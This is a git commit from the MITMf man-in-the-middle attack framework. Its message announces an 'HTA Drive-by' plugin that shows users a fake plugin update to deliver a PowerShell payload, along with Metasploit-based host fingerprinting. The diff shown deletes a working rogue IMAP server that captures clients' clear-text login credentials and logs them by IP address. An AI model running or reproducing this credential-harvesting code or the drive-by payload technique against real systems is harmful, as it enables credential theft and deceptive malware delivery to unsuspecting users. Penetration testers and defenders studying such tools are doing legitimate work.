This is a vewwwy big commit

- The inject plugin now uses beautifulsoup4 to actually parse HTML and add content to it as supposed to using regexes - The logging of the whole framework has been compleatly overhauled - plugindetect.js now includes os.js from the metasploit framework for os and browser detection, let's us fingerprint hosts even if UA is lying! - New plugin HTA Drive-by has been added, prompts the user for a plugin update and makes them download an hta app which contains a powershell payload - the API of the plugins has been simplified - Improvements and error handling to user-agent parsing - Some misc bugfixes
2025-07-07 05:22:15 -07:00 · 2015-07-18 20:14:07 +02:00 · 2015-07-18 20:14:07 +02:00 · 5e2f30fb89
commit 5e2f30fb89
parent ff0ada2a39
64 changed files with 3748 additions and 1473 deletions
--- a/core/responder/imap/IMAPServer.py
+++ b/core/responder/imap/IMAPServer.py
@ -1,51 +0,0 @@
-import logging
-import threading
-
-from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
-from IMAPPackets import *
-from core.responder.common import *
-
-mitmf_logger = logging.getLogger("mitmf")
-
-class IMAPServer():
-
-	def start(self):
-		try:
-			mitmf_logger.debug("[IMAPServer] online")
-			server = ThreadingTCPServer(("0.0.0.0", 143), IMAP)
-			t = threading.Thread(name="IMAPServer", target=server.serve_forever)
-			t.setDaemon(True)
-			t.start()
-		except Exception as e:
-			mitmf_logger.error("[IMAPServer] Error starting on port {}: {}".format(143, e))
-
-class ThreadingTCPServer(ThreadingMixIn, TCPServer):
-
-	allow_reuse_address = 1
-
-	def server_bind(self):
-		TCPServer.server_bind(self)
-
-#ESMTP server class.
-class IMAP(BaseRequestHandler):
-
-	def handle(self):
-		try:
-			self.request.send(str(IMAPGreating()))
-			data = self.request.recv(1024)
-			if data[5:15] == "CAPABILITY":
-				RequestTag = data[0:4]
-				self.request.send(str(IMAPCapability()))
-				self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag)))
-				data = self.request.recv(1024)
-			if data[5:10] == "LOGIN":
-				Credentials = data[10:].strip()
-				Outfile = "./logs/responder/IMAP-Clear-Text-Password-"+self.client_address[0]+".txt"
-				WriteData(Outfile,Credentials, Credentials)
-				#print '[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials)
-				mitmf_logger.info('[IMAPServer] IMAP Credentials from {}. ("User" "Pass"): {}'.format(self.client_address[0],Credentials))
-				self.request.send(str(ditchthisconnection()))
-				data = self.request.recv(1024)
-
-		except Exception as e:
-			mitmf_logger.error("[IMAPServer] Error handling request: {}".format(e))